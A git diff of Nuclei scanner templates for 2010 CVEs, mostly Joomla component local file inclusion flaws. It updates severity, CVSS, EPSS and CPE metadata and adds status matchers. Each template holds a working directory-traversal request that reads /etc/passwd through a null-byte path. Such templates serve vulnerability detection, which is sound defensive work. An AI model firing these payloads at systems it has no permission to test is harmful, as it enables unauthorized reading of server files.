CWE-22 - tags: cve,cve2010,joomla,lfi,edb,packetstorm + epss-score: 0.00477 + cpe: cpe:2.3:a:ternaria:com_vjdeo:1.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: ternaria + product: com_vjdeo + tags: cve,cve2010,joomla,lfi,edb,packetstorm http: - method: GET path: - "{{BaseURL}}/index.php?option=com_vjdeo&controller=../../../../../../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 diff --git a/http/cves/2010/CVE-2010-1429.yaml b/http/cves/2010/CVE-2010-1429.yaml index 849735c450..9e9e2bcccb 100644 --- a/http/cves/2010/CVE-2010-1429.yaml +++ b/http/cves/2010/CVE-2010-1429.yaml @@ -10,15 +10,21 @@ info: - https://rhn.redhat.com/errata/RHSA-2010-0377.html - https://nvd.nist.gov/vuln/detail/CVE-2010-1429 - https://nvd.nist.gov/vuln/detail/CVE-2008-3273 + - http://marc.info/?l=bugtraq&m=132698550418872&w=2 + - http://securitytracker.com/id?1023918 classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.3 + cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N + cvss-score: 5 cve-id: CVE-2010-1429 - cwe-id: CWE-200 + cwe-id: CWE-264 + epss-score: 0.00573 + cpe: cpe:2.3:a:redhat:jboss_enterprise_application_platform:*:cp08:*:*:*:*:*:* metadata: max-request: 1 shodan-query: title:"JBoss" verified: true + vendor: redhat + product: jboss_enterprise_application_platform tags: cve,cve2010,jboss,eap,tomcat,exposure http: diff --git a/http/cves/2010/CVE-2010-1461.yaml b/http/cves/2010/CVE-2010-1461.yaml index 1171b5d2f4..6e58f61607 100644 --- a/http/cves/2010/CVE-2010-1461.yaml +++ b/http/cves/2010/CVE-2010-1461.yaml @@ -3,7 +3,7 @@ id: CVE-2010-1461 info: name: Joomla! Component Photo Battle 1.0.1 - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in the Photo Battle (com_photobattle) component 1.0.1 for Joomla! allows remote attackers to read arbitrary files via the view parameter to index.php. reference: - https://www.exploit-db.com/exploits/12232 @@ -13,22 +13,28 @@ info: remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N + cvss-score: 5 cve-id: CVE-2010-1461 cwe-id: CWE-22 - cvss-score: 5.0 - tags: cve,cve2010,joomla,lfi,photo,edb + epss-score: 0.00477 + cpe: cpe:2.3:a:gogoritas:com_photobattle:1.0.1:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: gogoritas + product: com_photobattle + tags: cve,cve2010,joomla,lfi,photo,edb http: - method: GET path: - "{{BaseURL}}/index.php?option=com_photobattle&view=../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 diff --git a/http/cves/2010/CVE-2010-1469.yaml b/http/cves/2010/CVE-2010-1469.yaml index fd6e840b1c..b35273a45e 100644 --- a/http/cves/2010/CVE-2010-1469.yaml +++ b/http/cves/2010/CVE-2010-1469.yaml @@ -3,7 +3,7 @@ id: CVE-2010-1469 info: name: Joomla! Component JProject Manager 1.0 - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in the Ternaria Informatica JProject Manager (com_jprojectmanager) component 1.0 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12146 @@ -13,22 +13,28 @@ info: remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P + cvss-score: 6.8 cve-id: CVE-2010-1469 cwe-id: CWE-22 - cvss-score: 6.8 - tags: lfi,edb,packetstorm,cve,cve2010,joomla + epss-score: 0.00813 + cpe: cpe:2.3:a:ternaria:com_jprojectmanager:1.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: ternaria + product: com_jprojectmanager + tags: lfi,edb,packetstorm,cve,cve2010,joomla http: - method: GET path: - "{{BaseURL}}/index.php?option=com_jprojectmanager&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 diff --git a/http/cves/2010/CVE-2010-1470.yaml b/http/cves/2010/CVE-2010-1470.yaml index cc35f7aaa2..2d405862c0 100644 --- a/http/cves/2010/CVE-2010-1470.yaml +++ b/http/cves/2010/CVE-2010-1470.yaml @@ -8,27 +8,33 @@ info: reference: - https://www.exploit-db.com/exploits/12166 - https://nvd.nist.gov/vuln/detail/CVE-2010-1470 - - http://web.archive.org/web/20140723205548/http://secunia.com/advisories/39405/ - http://www.exploit-db.com/exploits/12166 + - http://www.vupen.com/english/advisories/2010/0858 remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2010-1470 cwe-id: CWE-22 - tags: cve2010,joomla,lfi,edb,cve + epss-score: 0.04616 + cpe: cpe:2.3:a:dev.pucit.edu.pk:com_webtv:1.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: dev.pucit.edu.pk + product: com_webtv + tags: cve2010,joomla,lfi,edb,cve http: - method: GET path: - "{{BaseURL}}/index.php?option=com_webtv&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 diff --git a/http/cves/2010/CVE-2010-1471.yaml b/http/cves/2010/CVE-2010-1471.yaml index 3ab8409d01..45fd20e8d8 100644 --- a/http/cves/2010/CVE-2010-1471.yaml +++ b/http/cves/2010/CVE-2010-1471.yaml @@ -14,19 +14,25 @@ info: cvss-score: 7.5 cve-id: CVE-2010-1471 cwe-id: CWE-22 - tags: cve,cve2010,joomla,lfi,edb + epss-score: 0.05684 + cpe: cpe:2.3:a:b-elektro:com_addressbook:1.5.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: b-elektro + product: com_addressbook + tags: cve,cve2010,joomla,lfi,edb http: - method: GET path: - "{{BaseURL}}/index.php?option=com_addressbook&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 diff --git a/http/cves/2010/CVE-2010-1472.yaml b/http/cves/2010/CVE-2010-1472.yaml index e62fb912f4..2c601b7227 100644 --- a/http/cves/2010/CVE-2010-1472.yaml +++ b/http/cves/2010/CVE-2010-1472.yaml @@ -8,27 +8,33 @@ info: reference: - https://www.exploit-db.com/exploits/12167 - https://nvd.nist.gov/vuln/detail/CVE-2010-1472 - - http://web.archive.org/web/20140723200143/http://secunia.com/advisories/39406/ - http://www.exploit-db.com/exploits/12167 + - http://www.vupen.com/english/advisories/2010/0859 remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2010-1472 cwe-id: CWE-22 - tags: cve,cve2010,joomla,lfi,edb + epss-score: 0.05684 + cpe: cpe:2.3:a:kazulah:com_horoscope:1.5.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: kazulah + product: com_horoscope + tags: cve,cve2010,joomla,lfi,edb http: - method: GET path: - "{{BaseURL}}/index.php?option=com_horoscope&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 diff --git a/http/cves/2010/CVE-2010-1473.yaml b/http/cves/2010/CVE-2010-1473.yaml index 90454e808a..83d5c8eb2c 100644 --- a/http/cves/2010/CVE-2010-1473.yaml +++ b/http/cves/2010/CVE-2010-1473.yaml @@ -3,7 +3,7 @@ id: CVE-2010-1473 info: name: Joomla! Component Advertising 0.25 - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in the Advertising (com_advertising) component 0.25 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12171 @@ -16,19 +16,25 @@ info: cvss-score: 6.8 cve-id: CVE-2010-1473 cwe-id: CWE-22 - tags: joomla,lfi,edb,packetstorm,cve,cve2010 + epss-score: 0.00826 + cpe: cpe:2.3:a:johnmccollum:com_advertising:0.25:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: johnmccollum + product: com_advertising + tags: joomla,lfi,edb,packetstorm,cve,cve2010 http: - method: GET path: - "{{BaseURL}}/index.php?option=com_advertising&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 diff --git a/http/cves/2010/CVE-2010-1474.yaml b/http/cves/2010/CVE-2010-1474.yaml index 307e7b0ef9..c16f307708 100644 --- a/http/cves/2010/CVE-2010-1474.yaml +++ b/http/cves/2010/CVE-2010-1474.yaml @@ -3,31 +3,37 @@ id: CVE-2010-1474 info: name: Joomla! Component Sweetykeeper 1.5 - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in the Sweety Keeper (com_sweetykeeper) component 1.5.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12182 - https://nvd.nist.gov/vuln/detail/CVE-2010-1474 - - http://web.archive.org/web/20140723205926/http://secunia.com/advisories/39388/ - http://www.exploit-db.com/exploits/12182 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/57662 classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P cvss-score: 6.8 cve-id: CVE-2010-1474 cwe-id: CWE-22 - tags: cve,cve2010,joomla,lfi,edb + epss-score: 0.01242 + cpe: cpe:2.3:a:supachai_teasakul:com_sweetykeeper:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: supachai_teasakul + product: com_sweetykeeper + tags: cve,cve2010,joomla,lfi,edb http: - method: GET path: - "{{BaseURL}}/index.php?option=com_sweetykeeper&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 diff --git a/http/cves/2010/CVE-2010-1475.yaml b/http/cves/2010/CVE-2010-1475.yaml index f06a03b036..9e25e172a1 100644 --- a/http/cves/2010/CVE-2010-1475.yaml +++ b/http/cves/2010/CVE-2010-1475.yaml @@ -3,31 +3,37 @@ id: CVE-2010-1475 info: name: Joomla! Component Preventive And Reservation 1.0.5 - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in the Preventive & Reservation (com_preventive) component 1.0.5 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12147 - https://nvd.nist.gov/vuln/detail/CVE-2010-1475 - - http://web.archive.org/web/20140723203010/http://secunia.com/advisories/39285/ - http://www.exploit-db.com/exploits/12147 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/57652 classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P cvss-score: 6.8 cve-id: CVE-2010-1475 cwe-id: CWE-22 - tags: edb,cve,cve2010,joomla,lfi + epss-score: 0.01242 + cpe: cpe:2.3:a:ternaria:com_preventive:1.0.5:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: ternaria + product: com_preventive + tags: edb,cve,cve2010,joomla,lfi http: - method: GET path: - "{{BaseURL}}/index.php?option=com_preventive&controller==../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 diff --git a/http/cves/2010/CVE-2010-1476.yaml b/http/cves/2010/CVE-2010-1476.yaml index 802571dbea..8dc0b6ec8b 100644 --- a/http/cves/2010/CVE-2010-1476.yaml +++ b/http/cves/2010/CVE-2010-1476.yaml @@ -3,7 +3,7 @@ id: CVE-2010-1476 info: name: Joomla! Component AlphaUserPoints 1.5.5 - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in the AlphaUserPoints (com_alphauserpoints) component 1.5.5 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the view parameter to index.php. reference: - https://www.exploit-db.com/exploits/12150 @@ -16,19 +16,25 @@ info: cvss-score: 6.8 cve-id: CVE-2010-1476 cwe-id: CWE-22 - tags: joomla,lfi,edb,packetstorm,cve,cve2010 + epss-score: 0.03527 + cpe: cpe:2.3:a:alphaplug:com_alphauserpoints:1.5.5:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: alphaplug + product: com_alphauserpoints + tags: joomla,lfi,edb,packetstorm,cve,cve2010 http: - method: GET path: - "{{BaseURL}}/index.php?option=com_alphauserpoints&view=../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 diff --git a/http/cves/2010/CVE-2010-1478.yaml b/http/cves/2010/CVE-2010-1478.yaml index 204f19f2f8..c8fcbbfd39 100644 --- a/http/cves/2010/CVE-2010-1478.yaml +++ b/http/cves/2010/CVE-2010-1478.yaml @@ -3,7 +3,7 @@ id: CVE-2010-1478 info: name: Joomla! Component Jfeedback 1.2 - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in the Ternaria Informatica Jfeedback! (com_jfeedback) component 1.2 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12145 @@ -16,19 +16,25 @@ info: cvss-score: 6.8 cve-id: CVE-2010-1478 cwe-id: CWE-22 - tags: cve,cve2010,joomla,lfi,edb + epss-score: 0.00826 + cpe: cpe:2.3:a:ternaria:com_jfeedback:1.2:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: ternaria + product: com_jfeedback + tags: cve,cve2010,joomla,lfi,edb http: - method: GET path: - "{{BaseURL}}/index.php?option=com_jfeedback&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 diff --git a/http/cves/2010/CVE-2010-1491.yaml b/http/cves/2010/CVE-2010-1491.yaml index 90474560f1..e36dccc99c 100644 --- a/http/cves/2010/CVE-2010-1491.yaml +++ b/http/cves/2010/CVE-2010-1491.yaml @@ -3,32 +3,38 @@ id: CVE-2010-1491 info: name: Joomla! Component MMS Blog 2.3.0 - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in the MMS Blog (com_mmsblog) component 2.3.0 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12318 - https://nvd.nist.gov/vuln/detail/CVE-2010-1491 - http://packetstormsecurity.org/1004-exploits/joomlammsblog-lfi.txt - - http://web.archive.org/web/20140724060325/http://secunia.com/advisories/39533/ + - http://www.exploit-db.com/exploits/12318 remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2010-1491 cwe-id: CWE-22 - tags: cve2010,joomla,lfi,edb,packetstorm,cve + epss-score: 0.00477 + cpe: cpe:2.3:a:mms.pipp:com_mmsblog:2.3.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: mms.pipp + product: com_mmsblog + tags: cve2010,joomla,lfi,edb,packetstorm,cve http: - method: GET path: - "{{BaseURL}}/index.php?option=com_mmsblog&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 diff --git a/http/cves/2010/CVE-2010-1494.yaml b/http/cves/2010/CVE-2010-1494.yaml index 9c01cb7a71..210518cbc9 100644 --- a/http/cves/2010/CVE-2010-1494.yaml +++ b/http/cves/2010/CVE-2010-1494.yaml @@ -3,31 +3,39 @@ id: CVE-2010-1494 info: name: Joomla! Component AWDwall 1.5.4 - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in the AWDwall (com_awdwall) component 1.5.4 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12113 - https://nvd.nist.gov/vuln/detail/CVE-2010-1494 - http://www.exploit-db.com/exploits/12113 + - http://www.awdwall.com/index.php/awdwall-updates-logs- + - https://exchange.xforce.ibmcloud.com/vulnerabilities/57693 remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2010-1494 cwe-id: CWE-22 - tags: cve,cve2010,joomla,lfi,edb + epss-score: 0.02305 + cpe: cpe:2.3:a:awdsolution:com_awdwall:1.5.4:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: awdsolution + product: com_awdwall + tags: cve,cve2010,joomla,lfi,edb http: - method: GET path: - "{{BaseURL}}/index.php?option=com_awdwall&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 diff --git a/http/cves/2010/CVE-2010-1495.yaml b/http/cves/2010/CVE-2010-1495.yaml index 6c2f72646f..a8e06a82a6 100644 --- a/http/cves/2010/CVE-2010-1495.yaml +++ b/http/cves/2010/CVE-2010-1495.yaml @@ -16,19 +16,25 @@ info: cvss-score: 7.5 cve-id: CVE-2010-1495 cwe-id: CWE-22 - tags: cve2010,joomla,lfi,edb,packetstorm,cve + epss-score: 0.04503 + cpe: cpe:2.3:a:matamko:com_matamko:1.01:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: matamko + product: com_matamko + tags: cve2010,joomla,lfi,edb,packetstorm,cve http: - method: GET path: - "{{BaseURL}}/index.php?option=com_matamko&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 diff --git a/http/cves/2010/CVE-2010-1531.yaml b/http/cves/2010/CVE-2010-1531.yaml index b1b524abff..32a6dbac86 100644 --- a/http/cves/2010/CVE-2010-1531.yaml +++ b/http/cves/2010/CVE-2010-1531.yaml @@ -9,25 +9,33 @@ info: - https://www.exploit-db.com/exploits/12054 - https://nvd.nist.gov/vuln/detail/CVE-2010-1531 - http://packetstormsecurity.org/1004-exploits/joomlaredshop-lfi.txt + - http://redcomponent.com/redshop/redshop-changelog + - https://exchange.xforce.ibmcloud.com/vulnerabilities/57512 remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2010-1531 cwe-id: CWE-22 - tags: lfi,edb,packetstorm,cve,cve2010,joomla + epss-score: 0.01815 + cpe: cpe:2.3:a:redcomponent:com_redshop:1.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: redcomponent + product: com_redshop + tags: lfi,edb,packetstorm,cve,cve2010,joomla http: - method: GET path: - "{{BaseURL}}/index.php?option=com_redshop&view=../../../../../../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 diff --git a/http/cves/2010/CVE-2010-1532.yaml b/http/cves/2010/CVE-2010-1532.yaml index fdf2893c8a..496e8df0ed 100644 --- a/http/cves/2010/CVE-2010-1532.yaml +++ b/http/cves/2010/CVE-2010-1532.yaml @@ -3,7 +3,7 @@ id: CVE-2010-1532 info: name: Joomla! Component PowerMail Pro 1.5.3 - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in the givesight PowerMail Pro (com_powermail) component 1.5.3 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12118 @@ -16,19 +16,25 @@ info: cvss-score: 5 cve-id: CVE-2010-1532 cwe-id: CWE-22 - tags: cve,cve2010,joomla,lfi,edb,packetstorm + epss-score: 0.00477 + cpe: cpe:2.3:a:givesight:com_powermail:1.53:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: givesight + product: com_powermail + tags: cve,cve2010,joomla,lfi,edb,packetstorm http: - method: GET path: - "{{BaseURL}}/index.php?option=com_powermail&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 diff --git a/http/cves/2010/CVE-2010-1533.yaml b/http/cves/2010/CVE-2010-1533.yaml index ed84b05d94..3d96cbf44c 100644 --- a/http/cves/2010/CVE-2010-1533.yaml +++ b/http/cves/2010/CVE-2010-1533.yaml @@ -13,22 +13,28 @@ info: remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P + cvss-score: 7.5 cve-id: CVE-2010-1533 cwe-id: CWE-22 - cvss-score: 7.5 - tags: cve2010,joomla,lfi,edb,cve + epss-score: 0.00706 + cpe: cpe:2.3:a:peter_hocherl:com_tweetla:1.0.1:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: peter_hocherl + product: com_tweetla + tags: cve2010,joomla,lfi,edb,cve http: - method: GET path: - "{{BaseURL}}/index.php?option=com_tweetla&controller=../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 diff --git a/http/cves/2010/CVE-2010-1534.yaml b/http/cves/2010/CVE-2010-1534.yaml index 8f2a85bf0f..e528940f57 100644 --- a/http/cves/2010/CVE-2010-1534.yaml +++ b/http/cves/2010/CVE-2010-1534.yaml @@ -3,32 +3,38 @@ id: CVE-2010-1534 info: name: Joomla! Component Shoutbox Pro - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in the Shoutbox Pro (com_shoutbox) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12067 - https://nvd.nist.gov/vuln/detail/CVE-2010-1534 - - http://web.archive.org/web/20210121195246/https://www.securityfocus.com/bid/39213/ - - http://web.archive.org/web/20140724182459/http://secunia.com/advisories/39352/ + - http://www.exploit-db.com/exploits/12067 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/57534 remediation: Upgrade to a supported version classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2010-1534 cwe-id: CWE-22 - tags: joomla,lfi,edb,cve,cve2010 + epss-score: 0.02437 + cpe: cpe:2.3:a:joomla.batjo:com_shoutbox:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: joomla.batjo + product: com_shoutbox + tags: joomla,lfi,edb,cve,cve2010 http: - method: GET path: - "{{BaseURL}}/index.php?option=com_shoutbox&controller=../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 diff --git a/http/cves/2010/CVE-2010-1535.yaml b/http/cves/2010/CVE-2010-1535.yaml index 62d09cfb78..9d59954d04 100644 --- a/http/cves/2010/CVE-2010-1535.yaml +++ b/http/cves/2010/CVE-2010-1535.yaml @@ -12,22 +12,28 @@ info: - http://www.exploit-db.com/exploits/12151 classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P + cvss-score: 7.5 cve-id: CVE-2010-1535 cwe-id: CWE-22 - cvss-score: 7.5 - tags: cve,cve2010,joomla,lfi,edb + epss-score: 0.00706 + cpe: cpe:2.3:a:peter_hocherl:com_travelbook:1.0.1:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: peter_hocherl + product: com_travelbook + tags: cve,cve2010,joomla,lfi,edb http: - method: GET path: - "{{BaseURL}}/index.php?option=com_travelbook&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 diff --git a/http/cves/2010/CVE-2010-1540.yaml b/http/cves/2010/CVE-2010-1540.yaml index 86baad8958..84b63947ce 100644 --- a/http/cves/2010/CVE-2010-1540.yaml +++ b/http/cves/2010/CVE-2010-1540.yaml @@ -3,7 +3,7 @@ id: CVE-2010-1540 info: name: Joomla! Component com_blog - Directory Traversal author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in index.php in the MyBlog (com_myblog) component 3.0.329 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the task parameter. reference: - https://www.exploit-db.com/exploits/11625 @@ -15,19 +15,25 @@ info: cvss-score: 5 cve-id: CVE-2010-1540 cwe-id: CWE-22 - tags: cve,cve2010,joomla,lfi,edb + epss-score: 0.0045 + cpe: cpe:2.3:a:myblog:com_myblog:3.0.329:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: myblog + product: com_myblog + tags: cve,cve2010,joomla,lfi,edb http: - method: GET path: - "{{BaseURL}}/index.php?option=com_myblog&Itemid=1&task=../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 diff --git a/http/cves/2010/CVE-2010-1586.yaml b/http/cves/2010/CVE-2010-1586.yaml index be1672ce8f..bb34d34313 100644 --- a/http/cves/2010/CVE-2010-1586.yaml +++ b/http/cves/2010/CVE-2010-1586.yaml @@ -9,14 +9,18 @@ info: reference: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1586 - https://yehg.net/lab/pr0js/advisories/hp_system_management_homepage_url_redirection_abuse + - https://exchange.xforce.ibmcloud.com/vulnerabilities/58107 classification: - cvss-metrics: AV:N/AC:M/Au:N/C:N/I:P/A:N + cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N cvss-score: 4.3 cve-id: CVE-2010-1586 cwe-id: CWE-20 + epss-score: 0.00841 cpe: cpe:2.3:a:hp:system_management_homepage:2.0.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: hp + product: system_management_homepage tags: cve,cve2010,redirect,smh,hp http: diff --git a/http/cves/2010/CVE-2010-1601.yaml b/http/cves/2010/CVE-2010-1601.yaml index 37dcce1b46..9368434e9f 100644 --- a/http/cves/2010/CVE-2010-1601.yaml +++ b/http/cves/2010/CVE-2010-1601.yaml @@ -3,31 +3,37 @@ id: CVE-2010-1601 info: name: Joomla! Component JA Comment - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in the JA Comment (com_jacomment) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php. reference: - https://www.exploit-db.com/exploits/12236 - https://nvd.nist.gov/vuln/detail/CVE-2010-1601 - - http://web.archive.org/web/20140803084823/http://secunia.com/advisories/39472/ - http://packetstormsecurity.org/1004-exploits/joomlajacomment-lfi.txt + - https://exchange.xforce.ibmcloud.com/vulnerabilities/57848 classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2010-1601 cwe-id: CWE-22 - tags: cve2010,joomla,lfi,edb,packetstorm,cve + epss-score: 0.01299 + cpe: cpe:2.3:a:joomlamart:com_jacomment:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: joomlamart + product: com_jacomment + tags: cve2010,joomla,lfi,edb,packetstorm,cve http: - method: GET path: - "{{BaseURL}}/index.php?option=com_jacomment&view=../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 diff --git a/http/cves/2010/CVE-2010-1602.yaml b/http/cves/2010/CVE-2010-1602.yaml index 9aadc30546..bfb5899ba6 100644 --- a/http/cves/2010/CVE-2010-1602.yaml +++ b/http/cves/2010/CVE-2010-1602.yaml @@ -9,24 +9,31 @@ info: - https://www.exploit-db.com/exploits/12283 - https://nvd.nist.gov/vuln/detail/CVE-2010-1602 - http://packetstormsecurity.org/1004-exploits/joomlazimbcomment-lfi.txt + - http://www.vupen.com/english/advisories/2010/0932 classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2010-1602 cwe-id: CWE-22 - tags: lfi,edb,packetstorm,cve,cve2010,joomla + epss-score: 0.03451 + cpe: cpe:2.3:a:zimbllc:com_zimbcomment:0.8.1:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: zimbllc + product: com_zimbcomment + tags: lfi,edb,packetstorm,cve,cve2010,joomla http: - method: GET path: - "{{BaseURL}}/index.php?option=com_zimbcomment&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 diff --git a/http/cves/2010/CVE-2010-1603.yaml b/http/cves/2010/CVE-2010-1603.yaml index 706798a21a..f845705a61 100644 --- a/http/cves/2010/CVE-2010-1603.yaml +++ b/http/cves/2010/CVE-2010-1603.yaml @@ -8,7 +8,6 @@ info: reference: - https://www.exploit-db.com/exploits/12284 - https://nvd.nist.gov/vuln/detail/CVE-2010-1603 - - http://web.archive.org/web/20210518112730/https://www.securityfocus.com/bid/39546 - http://www.vupen.com/english/advisories/2010/0931 remediation: Upgrade to a supported version. classification: @@ -16,19 +15,25 @@ info: cvss-score: 7.5 cve-id: CVE-2010-1603 cwe-id: CWE-22 - tags: cve2010,joomla,lfi,edb,cve + epss-score: 0.03451 + cpe: cpe:2.3:a:zimbllc:com_zimbcore:0.1:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: zimbllc + product: com_zimbcore + tags: cve2010,joomla,lfi,edb,cve http: - method: GET path: - 